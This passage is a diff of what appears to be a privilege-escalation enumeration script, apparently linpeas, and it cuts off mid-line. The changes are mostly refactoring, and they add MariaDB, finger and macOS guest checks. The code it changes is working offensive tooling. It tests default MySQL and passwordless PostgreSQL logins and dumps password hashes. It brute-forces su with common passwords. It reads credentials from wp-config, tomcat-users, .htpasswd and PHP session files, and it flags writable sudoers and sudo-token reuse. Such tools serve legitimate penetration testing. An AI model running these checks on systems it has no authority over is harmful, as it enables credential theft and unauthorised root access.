! [ "$IAMROOT" ] && [ -w '/etc/sudoers.d/' ]; then echo "You can create a file in /etc/sudoers.d/ and escalate privileges" | sed -${E} "s,.*,${SED_RED_YELLOW}," fi for filename in '/etc/sudoers.d/*'; do if [ -r "$filename" ]; then echo "Sudoers file: $filename is readable" | sed -${E} "s,.*,${SED_RED},g" - cat "$filename" | grep -Iv "^$" | grep -v "#" | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoB,${SED_RED},g" | sed "s,pwfeedback,${SED_RED},g" | sed -${E} "s,$sudoVB,${SED_RED_YELLOW}," + grep -Iv "^$" "$filename" | grep -v "#" | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoB,${SED_RED},g" | sed "s,pwfeedback,${SED_RED},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW}," fi done echo "" @@ -1821,11 +2129,11 @@ if [ "`echo $CHECKS | grep UsrI`" ]; then #-- UI) Sudo tokens print_2title "Checking sudo tokens" print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#reusing-sudo-tokens" - ptrace_scope="`cat /proc/sys/kernel/yama/ptrace_scope 2>/dev/null`" + ptrace_scope="$(cat /proc/sys/kernel/yama/ptrace_scope 2>/dev/null)" if [ "$ptrace_scope" ] && [ "$ptrace_scope" -eq 0 ]; then echo "/proc/sys/kernel/yama/ptrace_scope is enabled (0)" | sed "s,0,${SED_RED},g"; else echo "/proc/sys/kernel/yama/ptrace_scope is not enabled ($ptrace_scope)" | sed "s,is not enabled,${SED_GREEN},g"; fi - is_gdb="`command -v gdb 2>/dev/null`" + is_gdb="$(command -v gdb 2>/dev/null)" if [ "$is_gdb" ]; then echo "gdb was found in PATH" | sed -${E} "s,.*,${SED_RED},g"; else echo "gdb wasn't found in PATH" | sed "s,gdb,${SED_GREEN},g"; fi @@ -1845,43 +2153,45 @@ if [ "`echo $CHECKS | grep UsrI`" ]; then #-- UI) Doas print_2title "Checking doas.conf" - if [ "`cat /etc/doas.conf "$(dirname $(command -v doas) 2>/dev/null)/doas.conf" "$(dirname $(command -v doas) 2>/dev/null)/../etc/doas.conf" "$(dirname $(command -v doas) 2>/dev/null)/etc/doas.conf" 2>/dev/null`" ]; then cat /etc/doas.conf "$(dirname $(command -v doas))/doas.conf" "$(dirname $(command -v doas))/../etc/doas.conf" "$(dirname $(command -v doas))/etc/doas.conf" 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_RED}," | sed "s,root,${SED_RED}," | sed "s,nopass,${SED_RED}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,$USER,${SED_RED_YELLOW}," - else echo_not_found "/etc/doas.conf" + doas_dir_name=$(dirname "$(command -v doas)" 2>/dev/null) + if [ "$(cat /etc/doas.conf $doas_dir_name/doas.conf $doas_dir_name/../etc/doas.conf $doas_dir_name/etc/doas.conf 2>/dev/null)" ]; then + cat /etc/doas.conf "$doas_dir_name/doas.conf" "$doas_dir_name/../etc/doas.conf" "$doas_dir_name/etc/doas.conf" 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_RED}," | sed "s,root,${SED_RED}," | sed "s,nopass,${SED_RED}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,$USER,${SED_RED_YELLOW}," + else echo_not_found "doas.conf" fi echo "" #-- UI) Pkexec policy print_2title "Checking Pkexec policy" print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/interesting-groups-linux-pe#pe-method-2" - (cat /etc/polkit-1/localauthority.conf.d/* 2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null | sed -${E} "s,$groupsB,${SED_RED}," | sed -${E} "s,$groupsVB,${SED_RED}," | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,$USER,${SED_RED_YELLOW}," | sed -${E} "s,$Groups,${SED_RED_YELLOW},") || echo_not_found "/etc/polkit-1/localauthority.conf.d" + (cat /etc/polkit-1/localauthority.conf.d/* 2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null | sed -${E} "s,$groupsB,${SED_RED}," | sed -${E} "s,$groupsVB,${SED_RED}," | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,$USER,${SED_RED_YELLOW}," | sed -${E} "s,$Groups,${SED_RED_YELLOW},") || echo_not_found "/etc/polkit-1/localauthority.conf.d" echo "" #-- UI) Superusers print_2title "Superusers" - awk -F: '($3 == "0") {print}' /etc/passwd 2>/dev/null | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED_YELLOW}," | sed "s,root,${SED_RED}," + awk -F: '($3 == "0") {print}' /etc/passwd 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED_YELLOW}," | sed "s,root,${SED_RED}," echo "" #-- UI) Users with console print_2title "Users with console" if [ "$MACPEAS" ]; then dscl . list /Users | while read uname; do - ushell=`dscl . -read "/Users/$uname" UserShell | cut -d " " -f2` - if [ "`grep \"$ushell\" /etc/shells`" ]; then #Shell user - dscl . -read "/Users/$uname" UserShell RealName RecordName Password NFSHomeDirectory 2>/dev/null | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed "s,$USER,${C}[1;95m&${C}[0m," | sed "s,root,${SED_RED}," + ushell=$(dscl . -read "/Users/$uname" UserShell | cut -d " " -f2) + if grep -q "$ushell" /etc/shells; then #Shell user + dscl . -read "/Users/$uname" UserShell RealName RecordName Password NFSHomeDirectory 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," echo "" fi done else - no_shells="`cat /etc/passwd 2>/dev/null | grep -Ev "sh$" | cut -d ":" -f 7 | sort | uniq`" + no_shells=$(grep -Ev "sh$" /etc/passwd 2>/dev/null | cut -d ':' -f 7 | sort | uniq) unexpected_shells="" printf "%s\n" "$no_shells" | while read f; do - if [ "`$f -c 'whoami' 2>/dev/null | grep \"$USER\"`" ]; then + if $f -c 'whoami' 2>/dev/null | grep -q "$USER"; then unexpected_shells="$f\n$unexpected_shells" fi done - cat /etc/passwd 2>/dev/null | grep "sh$" | sort | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed "s,$USER,${C}[1;95m&${C}[0m," | sed "s,root,${SED_RED}," + grep "sh$" /etc/passwd 2>/dev/null | sort | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," if [ "$unexpected_shells" ]; then - echo "These unexpected binaries are acting like shells:\n$unexpected_shells" | sed -${E} "s,/.*,${SED_RED},g" + printf "%s" "These unexpected binaries are acting like shells:\n$unexpected_shells" | sed -${E} "s,/.*,${SED_RED},g" echo "Unexpected users with shells:" printf "%s\n" "$unexpected_shells" | while read f; do if [ "$f" ]; then @@ -1895,25 +2205,36 @@ if [ "`echo $CHECKS | grep UsrI`" ]; then #-- UI) All users & groups print_2title "All users & groups" if [ "$MACPEAS" ]; then - dscl . list /Users | while read i; do id $i;done 2>/dev/null | sort | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED},g" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m,g" | sed "s,$USER,${C}[1;95m&${C}[0m,g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g" + dscl . list /Users | while read i; do id $i;done 2>/dev/null | sort | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g" else - cut -d":" -f1 /etc/passwd 2>/dev/null| while read i; do id $i;done 2>/dev/null | sort | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED},g" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m,g" | sed "s,$USER,${C}[1;95m&${C}[0m,g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g" + cut -d":" -f1 /etc/passwd 2>/dev/null| while read i; do id $i;done 2>/dev/null | sort | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g" fi echo "" #-- UI) Login now print_2title "Login now" - (w || who || users) 2>/dev/null | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${C}[1;95m&${C}[0m," | sed "s,root,${SED_RED}," + (w || who || finger || users) 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," echo "" #-- UI) Last logons print_2title "Last logons" - (last -Faiw || last) 2>/dev/null | tail | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed -${E} "s,$nosh_usrs,${SED_RED}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${C}[1;95m&${C}[0m," | sed "s,root,${SED_RED}," + (last -Faiw || last) 2>/dev/null | tail | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_RED}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," echo "" #-- UI) Login info print_2title "Last time logon each user" - lastlog 2>/dev/null | grep -v "Never" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${C}[1;95m&${C}[0m," | sed "s,root,${SED_RED}," + lastlog 2>/dev/null | grep -v "Never" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," + + EXISTS_FINGER="$(command -v finger 2>/dev/null)" + if [ "$MACPEAS" ] && [ "$EXISTS_FINGER" ]; then + dscl . list /Users | while read uname; do + ushell=$(dscl . -read "/Users/$uname" UserShell | cut -d " " -f2) + if grep -q "$ushell" /etc/shells; then #Shell user + finger "$uname" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," + echo "" + fi + done + fi echo "" #-- UI) Password policy @@ -1921,16 +2242,28 @@ if [ "`echo $CHECKS | grep UsrI`" ]; then grep "^PASS_MAX_DAYS\|^PASS_MIN_DAYS\|^PASS_WARN_AGE\|^ENCRYPT_METHOD" /etc/login.defs 2>/dev/null || echo_not_found "/etc/login.defs" echo "" + if [ "$MACPEAS" ]; then + print_2title "Relevant last user info and user configs" + defaults read /Library/Preferences/com.apple.loginwindow.plist 2>/dev/null + echo "" + + print_2title "Guest user status" + sysadminctl -afpGuestAccess status | sed -${E} "s,enabled,${SED_RED}," | sed -${E} "s,disabled,${SED_GREEN}," + sysadminctl -guestAccount status | sed -${E} "s,enabled,${SED_RED}," | sed -${E} "s,disabled,${SED_GREEN}," + sysadminctl -smbGuestAccess status | sed -${E} "s,enabled,${SED_RED}," | sed -${E} "s,disabled,${SED_GREEN}," + echo "" + fi + #-- UI) Brute su - EXISTS_SUDO="`command -v sudo 2>/dev/null`" + EXISTS_SUDO="$(command -v sudo 2>/dev/null)" if ! [ "$FAST" ] && ! [ "$SUPERFAST" ] && [ "$TIMEOUT" ] && ! [ "$IAMROOT" ] && [ "$EXISTS_SUDO" ]; then print_2title "Testing 'su' as other users with shell using as passwords: null pwd, the username and top2000pwds\n"$NC - POSSIBE_SU_BRUTE=`check_if_su_brute`; + POSSIBE_SU_BRUTE=$(check_if_su_brute); if [ "$POSSIBE_SU_BRUTE" ]; then - SHELLUSERS=`cat /etc/passwd 2>/dev/null | grep -i "sh$" | cut -d ":" -f 1` + SHELLUSERS=$(cat /etc/passwd 2>/dev/null | grep -i "sh$" | cut -d ":" -f 1) printf "%s\n" "$SHELLUSERS" | while read u; do echo " Bruteforcing user $u..." - su_brute_user_num $u $PASSTRY + su_brute_user_num "$u" $PASSTRY done else printf $GREEN"It's not possible to brute-force su.\n\n"$NC @@ -1945,7 +2278,7 @@ if [ "`echo $CHECKS | grep UsrI`" ]; then fi -if [ "`echo $CHECKS | grep SofI`" ]; then +if echo $CHECKS | grep -q SofI; then ########################################### #--------) Software Information (---------# ########################################### @@ -1958,7 +2291,7 @@ if [ "`echo $CHECKS | grep SofI`" ]; then #-- SI) Mysql connection root/root print_list "MySQL connection using default root/root ........... " - mysqlconnect=`mysqladmin -uroot -proot version 2>/dev/null` + mysqlconnect=$(mysqladmin -uroot -proot version 2>/dev/null) if [ "$mysqlconnect" ]; then echo "Yes" | sed -${E} "s,.*,${SED_RED}," mysql -u root --password=root -e "SELECT User,Host,authentication_string FROM mysql.user;" 2>/dev/null | sed -${E} "s,.*,${SED_RED}," @@ -1967,7 +2300,7 @@ if [ "`echo $CHECKS | grep SofI`" ]; then #-- SI) Mysql connection root/toor print_list "MySQL connection using root/toor ................... " - mysqlconnect=`mysqladmin -uroot -ptoor version 2>/dev/null` + mysqlconnect=$(mysqladmin -uroot -ptoor version 2>/dev/null) if [ "$mysqlconnect" ]; then echo "Yes" | sed -${E} "s,.*,${SED_RED}," mysql -u root --password=toor -e "SELECT User,Host,authentication_string FROM mysql.user;" 2>/dev/null | sed -${E} "s,.*,${SED_RED}," @@ -1975,7 +2308,7 @@ if [ "`echo $CHECKS | grep SofI`" ]; then fi #-- SI) Mysql connection root/NOPASS - mysqlconnectnopass=`mysqladmin -uroot version 2>/dev/null` + mysqlconnectnopass=$(mysqladmin -uroot version 2>/dev/null) print_list "MySQL connection using root/NOPASS ................. " if [ "$mysqlconnectnopass" ]; then echo "Yes" | sed -${E} "s,.*,${SED_RED}," @@ -1987,31 +2320,31 @@ if [ "`echo $CHECKS | grep SofI`" ]; then print_2title "Searching mysql credentials and exec" if [ "$PSTORAGE_MYSQL" ]; then printf "%s\n" "$PSTORAGE_MYSQL" | while read d; do - for f in `find $d -name debian.cnf 2>/dev/null`; do - if [ -r $f ]; then + for f in $(find $d -name debian.cnf 2>/dev/null); do + if [ -r "$f" ]; then echo "We can read the mysql debian.cnf. You can use this username/password to log in MySQL" | sed -${E} "s,.*,${SED_RED}," cat "$f" fi done - for f in `find $d -name user.MYD 2>/dev/null`; do + for f in $(find $d -name user.MYD 2>/dev/null); do if [ -r "$f" ]; then echo "We can read the Mysql Hashes from $f" | sed -${E} "s,.*,${SED_RED}," grep -oaE "[-_\.\*a-Z0-9]{3,}" $f | grep -v "mysql_native_password" fi done - for f in `grep -lr "user\s*=" $d 2>/dev/null | grep -v "debian.cnf"`; do + for f in $(grep -lr "user\s*=" $d 2>/dev/null | grep -v "debian.cnf"); do if [ -r "$f" ]; then - u=`cat "$f" | grep -v "#" | grep "user" | grep "=" 2>/dev/null` - echo "From '$f' Mysql user: $u" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${C}[1;95m&${C}[0m," | sed "s,root,${SED_RED}," + u=$(cat "$f" | grep -v "#" | grep "user" | grep "=" 2>/dev/null) + echo "From '$f' Mysql user: $u" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," fi done - for f in `find $d -name my.cnf 2>/dev/null`; do + for f in $(find $d -name my.cnf 2>/dev/null); do if [ -r "$f" ]; then echo "Found readable $f" - cat "$f" | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null | grep -Iv "^$" | sed "s,password.*,${SED_RED}," + grep -v "^#" "$f" | grep -Ev "\W+\#|^#" 2>/dev/null | grep -Iv "^$" | sed "s,password.*,${SED_RED}," fi done - mysqlexec=`whereis lib_mysqludf_sys.so 2>/dev/null | grep "lib_mysqludf_sys\.so"` + mysqlexec=$(whereis lib_mysqludf_sys.so 2>/dev/null | grep "lib_mysqludf_sys\.so") if [ "$mysqlexec" ]; then echo "Found $mysqlexec" echo "If you can login in MySQL you can execute commands doing: SELECT sys_eval('id');" | sed -${E} "s,.*,${SED_RED}," @@ -2021,7 +2354,12 @@ if [ "`echo $CHECKS | grep SofI`" ]; then fi echo "" - print_2title "Analizing PostgreSQL Files (limit 70)" + print_2title "Analyzing MariaDB Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_MARIADB\" | grep -E \"mariadb\.cnf$\"`" ]; then echo_not_found "mariadb.cnf"; fi; printf "%s" "$PSTORAGE_MARIADB" | grep -E "mariadb\.cnf$" | while read f; do ls -ld "$f" | sed -${E} "s,mariadb\.cnf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,user.*|password.*,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_MARIADB\" | grep -E \"debian\.cnf$\"`" ]; then echo_not_found "debian.cnf"; fi; printf "%s" "$PSTORAGE_MARIADB" | grep -E "debian\.cnf$" | while read f; do ls -ld "$f" | sed -${E} "s,debian\.cnf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "user.*|password.*" | sed -${E} "s,user.*|password.*,${SED_RED},g"; done; echo ""; + + + print_2title "Analyzing PostgreSQL Files (limit 70)" echo "Version: $(warn_exec psql -V 2>/dev/null)" if ! [ "`echo \"$PSTORAGE_POSTGRESQL\" | grep -E \"pgadmin.*\.db$\"`" ]; then echo_not_found "pgadmin*.db"; fi; printf "%s" "$PSTORAGE_POSTGRESQL" | grep -E "pgadmin.*\.db$" | while read f; do ls -ld "$f" | sed -${E} "s,pgadmin.*\.db$,${SED_RED},"; done; echo ""; if ! [ "`echo \"$PSTORAGE_POSTGRESQL\" | grep -E \"pg_hba\.conf$\"`" ]; then echo_not_found "pg_hba.conf"; fi; printf "%s" "$PSTORAGE_POSTGRESQL" | grep -E "pg_hba\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,pg_hba\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#" | sed -${E} "s,auth|password|md5|user=|pass=|trust,${SED_RED},g"; done; echo ""; @@ -2033,104 +2371,104 @@ if [ "`echo $CHECKS | grep SofI`" ]; then if [ "$TIMEOUT" ]; then # In some OS (like OpenBSD) it will expect the password from console and will pause the script. Also, this OS doesn't have the "timeout" command so lets only use this checks in OS that has it. #checks to see if any postgres password exists and connects to DB 'template0' - following commands are a variant on this print_list "PostgreSQL connection to template0 using postgres/NOPASS ........ " - if [ "`timeout 1 psql -U postgres -d template0 -c 'select version()' 2>/dev/null`" ]; then echo "Yes" | sed -${E} "s,.*,${SED_RED}," + if [ "$(timeout 1 psql -U postgres -d template0 -c 'select version()' 2>/dev/null)" ]; then echo "Yes" | sed -${E} "s,.*,${SED_RED}," else echo_no fi print_list "PostgreSQL connection to template1 using postgres/NOPASS ........ " - if [ "`timeout 1 psql -U postgres -d template1 -c 'select version()' 2>/dev/null`" ]; then echo "Yes" | sed "s,.)*,${SED_RED}," + if [ "$(timeout 1 psql -U postgres -d template1 -c 'select version()' 2>/dev/null)" ]; then echo "Yes" | sed "s,.)*,${SED_RED}," else echo_no fi print_list "PostgreSQL connection to template0 using pgsql/NOPASS ........... " - if [ "`timeout 1 psql -U pgsql -d template0 -c 'select version()' 2>/dev/null`" ]; then echo "Yes" | sed -${E} "s,.*,${SED_RED}," + if [ "$(timeout 1 psql -U pgsql -d template0 -c 'select version()' 2>/dev/null)" ]; then echo "Yes" | sed -${E} "s,.*,${SED_RED}," else echo_no fi print_list "PostgreSQL connection to template1 using pgsql/NOPASS ........... " - if [ "`timeout 1 psql -U pgsql -d template1 -c 'select version()' 2> /dev/null`" ]; then echo "Yes" | sed -${E} "s,.*,${SED_RED}," + if [ "$(timeout 1 psql -U pgsql -d template1 -c 'select version()' 2> /dev/null)" ]; then echo "Yes" | sed -${E} "s,.*,${SED_RED}," else echo_no fi echo "" fi - print_2title "Analizing Mongo Files (limit 70)" + print_2title "Analyzing Mongo Files (limit 70)" echo "Version: $(warn_exec mongo --version 2>/dev/null; warn_exec mongod --version 2>/dev/null)" if ! [ "`echo \"$PSTORAGE_MONGO\" | grep -E \"mongod.*\.conf$\"`" ]; then echo_not_found "mongod*.conf"; fi; printf "%s" "$PSTORAGE_MONGO" | grep -E "mongod.*\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,mongod.*\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#"; done; echo ""; - print_2title "Analizing Apache Files (limit 70)" + print_2title "Analyzing Apache Files (limit 70)" echo "Version: $(warn_exec apache2 -v 2>/dev/null; warn_exec httpd -v 2>/dev/null)" print_3title 'PHP exec extensions' grep -R -B1 "httpd-php" /etc/apache2 2>/dev/null - if ! [ "`echo \"$PSTORAGE_APACHE\" | grep -E \"sites-enabled$\"`" ]; then echo_not_found "sites-enabled"; fi; printf "%s" "$PSTORAGE_APACHE" | grep -E "sites-enabled$" | while read f; do ls -ld "$f" | sed -${E} "s,sites-enabled$,${SED_RED},"; for ff in $(find "$f" -name "*"); do ls -ld "$ff" | sed -${E} "s,,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E "AuthType|AuthName|AuthUserFile|ServerName|ServerAlias" | grep -Ev "^#" | sed -${E} "s,AuthType|AuthName|AuthUserFile|ServerName|ServerAlias,${SED_RED},g"; done; echo "";done; echo ""; - if ! [ "`echo \"$PSTORAGE_APACHE\" | grep -E \"000-default$\"`" ]; then echo_not_found "000-default"; fi; printf "%s" "$PSTORAGE_APACHE" | grep -E "000-default$" | while read f; do ls -ld "$f" | sed -${E} "s,000-default$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,AuthType|AuthName|AuthUserFile|ServerName|ServerAlias,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_APACHE\" | grep -E \"sites-enabled$\"`" ]; then echo_not_found "sites-enabled"; fi; printf "%s" "$PSTORAGE_APACHE" | grep -E "sites-enabled$" | while read f; do ls -ld "$f" | sed -${E} "s,sites-enabled$,${SED_RED},"; for ff in $(find "$f" -name "*"); do ls -ld "$ff" | sed -${E} "s,.*,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E "AuthType|AuthName|AuthUserFile|ServerName|ServerAlias" | grep -Ev "#" | sed -${E} "s,AuthType|AuthName|AuthUserFile|ServerName|ServerAlias,${SED_RED},g"; done; echo "";done; echo ""; + if ! [ "`echo \"$PSTORAGE_APACHE\" | grep -E \"000-default\.conf$\"`" ]; then echo_not_found "000-default.conf"; fi; printf "%s" "$PSTORAGE_APACHE" | grep -E "000-default\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,000-default\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,AuthType|AuthName|AuthUserFile|ServerName|ServerAlias,${SED_RED},g"; done; echo ""; - print_2title "Analizing Tomcat Files (limit 70)" + print_2title "Analyzing Tomcat Files (limit 70)" if ! [ "`echo \"$PSTORAGE_TOMCAT\" | grep -E \"tomcat-users\.xml$\"`" ]; then echo_not_found "tomcat-users.xml"; fi; printf "%s" "$PSTORAGE_TOMCAT" | grep -E "tomcat-users\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,tomcat-users\.xml$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "username=|password=" | sed -${E} "s,dbtype|dbhost|dbuser|dbhost|dbpass|dbport,${SED_RED},g"; done; echo ""; - print_2title "Analizing FastCGI Files (limit 70)" + print_2title "Analyzing FastCGI Files (limit 70)" if ! [ "`echo \"$PSTORAGE_FASTCGI\" | grep -E \"fastcgi_params$\"`" ]; then echo_not_found "fastcgi_params"; fi; printf "%s" "$PSTORAGE_FASTCGI" | grep -E "fastcgi_params$" | while read f; do ls -ld "$f" | sed -${E} "s,fastcgi_params$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "DB_NAME|DB_USER|DB_PASS" | sed -${E} "s,DB_NAME|DB_USER|DB_PASS,${SED_RED},g"; done; echo ""; - print_2title "Analizing Http conf Files (limit 70)" + print_2title "Analyzing Http conf Files (limit 70)" if ! [ "`echo \"$PSTORAGE_HTTP_CONF\" | grep -E \"httpd\.conf$\"`" ]; then echo_not_found "httpd.conf"; fi; printf "%s" "$PSTORAGE_HTTP_CONF" | grep -E "httpd\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,httpd\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "htaccess.*|htpasswd.*" | grep -Ev "\W+\#|^#" | sed -${E} "s,htaccess.*|htpasswd.*,${SED_RED},g"; done; echo ""; - print_2title "Analizing Htpasswd Files (limit 70)" + print_2title "Analyzing Htpasswd Files (limit 70)" if ! [ "`echo \"$PSTORAGE_HTPASSWD\" | grep -E \"\.htpasswd$\"`" ]; then echo_not_found ".htpasswd"; fi; printf "%s" "$PSTORAGE_HTPASSWD" | grep -E "\.htpasswd$" | while read f; do ls -ld "$f" | sed -${E} "s,\.htpasswd$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; - print_2title "Analizing PHPCookies Files (limit 70)" + print_2title "Analyzing PHP Sessions Files (limit 70)" ls /var/lib/php/sessions 2>/dev/null || echo_not_found /var/lib/php/sessions - if ! [ "`echo \"$PSTORAGE_PHPCOOKIES\" | grep -E \"sess_.*$\"`" ]; then echo_not_found "sess_*"; fi; printf "%s" "$PSTORAGE_PHPCOOKIES" | grep -E "sess_.*$" | while read f; do ls -ld "$f" | sed -${E} "s,sess_.*$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_PHP_SESSIONS\" | grep -E \"sess_.*$\"`" ]; then echo_not_found "sess_*"; fi; printf "%s" "$PSTORAGE_PHP_SESSIONS" | grep -E "sess_.*$" | while read f; do ls -ld "$f" | sed -${E} "s,sess_.*$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; - print_2title "Analizing Wordpress Files (limit 70)" + print_2title "Analyzing Wordpress Files (limit 70)" if ! [ "`echo \"$PSTORAGE_WORDPRESS\" | grep -E \"wp-config\.php$\"`" ]; then echo_not_found "wp-config.php"; fi; printf "%s" "$PSTORAGE_WORDPRESS" | grep -E "wp-config\.php$" | while read f; do ls -ld "$f" | sed -${E} "s,wp-config\.php$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "PASSWORD|USER|NAME|HOST" | sed -${E} "s,PASSWORD|USER|NAME|HOST,${SED_RED},g"; done; echo ""; - print_2title "Analizing Drupal Files (limit 70)" + print_2title "Analyzing Drupal Files (limit 70)" if ! [ "`echo \"$PSTORAGE_DRUPAL\" | grep -E \"settings\.php$\"`" ]; then echo_not_found "settings.php"; fi; printf "%s" "$PSTORAGE_DRUPAL" | grep -E "settings\.php$" | while read f; do ls -ld "$f" | sed -${E} "s,settings\.php$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "drupal_hash_salt|'database'|'username'|'password'|'host'|'port'|'driver'|'prefix'" | sed -${E} "s,drupal_hash_salt|'database'|'username'|'password'|'host'|'port'|'driver'|'prefix',${SED_RED},g"; done; echo ""; - print_2title "Analizing Moodle Files (limit 70)" + print_2title "Analyzing Moodle Files (limit 70)" if ! 